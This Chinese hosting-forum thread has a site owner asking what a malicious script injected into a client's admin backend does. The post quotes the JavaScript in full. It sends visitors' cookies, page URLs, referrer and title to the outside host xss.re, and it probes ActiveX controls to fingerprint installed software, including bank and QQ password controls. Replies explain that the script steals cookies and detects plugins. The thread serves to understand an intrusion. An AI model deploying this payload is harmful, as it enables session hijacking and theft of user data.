设为首页收藏本站

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 请教高手这段xss代码的作用
返回列表 发新帖
查看: 72|回复: 7

请教高手这段xss代码的作用

[复制链接]
Captain

227

主题

6001

回帖

1万

积分

论坛元老

积分
12869
发表于 2015-1-13 23:45:27 | 显示全部楼层 |阅读模式
有个客户企业网站后台被xss了,特有此问

[ol][*]
[*]var x=new Image();
[*]try
[*]{
[*]var myopener='';
[*]myopener=window.opener && window.opener.location ? window.opener.location : '';
[*]}
[*]catch(err)
[*]{
[*]}
[*]x.src='http://xss.re/XSS/?do=api&act=r&id=2603&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape
[*]
[*](document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);var activexa = new Array(
[*]  "Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
[*]  "Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
[*]  "360Safe|360SafeLive.Update|classID",
[*]  "Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
[*]  "CMB Bank|CMBHtmlControl.Edit|classID",
[*]  "Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",  
[*]  "Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
[*]  "JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
[*]  "JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
[*]  "KMPlayer|KMPlayer.TKMPDropTarget|classID",
[*]  "KingSoft Word(�ʰ�)|KSEngine.Word|classID",
[*]  "Windows live Messanger|Messenger.MsgrObject|classID",
[*]  "Nero|NeroFileDialog.NeroFileDlg|classID",
[*]  "Nokia Cellphone|NokiaCL.PhoneControl|classID",
[*]  "PPlayer|PPlayer.XPPlayer|classID",
[*]  "Tencent QQ|Qqedit.PasswordEditCtrl|classID",
[*]  "QuickTime|QuickTime.QTElementBehavior|classID",
[*]  "Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
[*]  "Xunlei|XunLeiBHO.ThunderIEHelper|classID"
[*]);
[*]
[*]function iescan(){
[*]          var mytmp;
[*]          var plus;
[*]          var bar;
[*]          var x=new Image();
[*]          for (i=0; i复制代码
回复

使用道具 举报

雨宫音羽

93

主题

2463

回帖

5265

积分

论坛元老

积分
5265
发表于 2015-1-14 00:18:04 | 显示全部楼层
似乎是获取访问者的相关信息。。包括在此站的cookie referrer 浏览器插件 访问的页面URL以及标题 通过生成一个伪图片src让浏览器发送到xss.re
回复

使用道具 举报

Captain

227

主题

6001

回帖

1万

积分

论坛元老

积分
12869
 楼主| 发表于 2015-1-14 03:42:00 | 显示全部楼层

雨宫音羽 发表于 2015-1-14 00:18

似乎是获取访问者的相关信息。。包括在此站的cookie referrer 浏览器插件 访问的页面URL以及标题 通过生成 ...
多谢,应该是也有获取登录站点cookies里密码的效果?
回复

使用道具 举报

雨宫音羽

93

主题

2463

回帖

5265

积分

论坛元老

积分
5265
发表于 2015-1-14 01:43:45 | 显示全部楼层

Captain 发表于 2015-1-14 01:43

多谢,应该是也有获取登录站点cookies里密码的效果?
cookie都获取到了 里面啥东西那肯定也一起过去了。。
回复

使用道具 举报

Captain

227

主题

6001

回帖

1万

积分

论坛元老

积分
12869
 楼主| 发表于 2015-1-14 00:18:00 | 显示全部楼层

雨宫音羽 发表于 2015-1-14 02:00

cookie都获取到了 里面啥东西那肯定也一起过去了。。
只限制这个站点的cookies,还会不会涉及到本地计算机其他隐私信息?
回复

使用道具 举报

雨宫音羽

93

主题

2463

回帖

5265

积分

论坛元老

积分
5265
发表于 2015-1-14 02:00:40 | 显示全部楼层
如果是只有这些代码的话那就只有我说的那些信息没别的

毕竟都只是“正常”使用Javascript。。没搞溢出之类的...
回复

使用道具 举报

Captain

227

主题

6001

回帖

1万

积分

论坛元老

积分
12869
 楼主| 发表于 2015-1-14 01:43:00 | 显示全部楼层

雨宫音羽 发表于 2015-1-14 05:24

如果是只有这些代码的话那就只有我说的那些信息没别的

毕竟都只是“正常”使用Javascript。。没搞溢出之类 ...
嗯嗯,中间还有一段很多软件的代码是什么含义?
回复

使用道具 举报

雨宫音羽

93

主题

2463

回帖

5265

积分

论坛元老

积分
5265
发表于 2015-1-14 03:38:45 | 显示全部楼层

Captain 发表于 2015-1-14 16:40

嗯嗯,中间还有一段很多软件的代码是什么含义?
检测浏览器插件的
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-4-20 00:35 , Processed in 0.020931 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表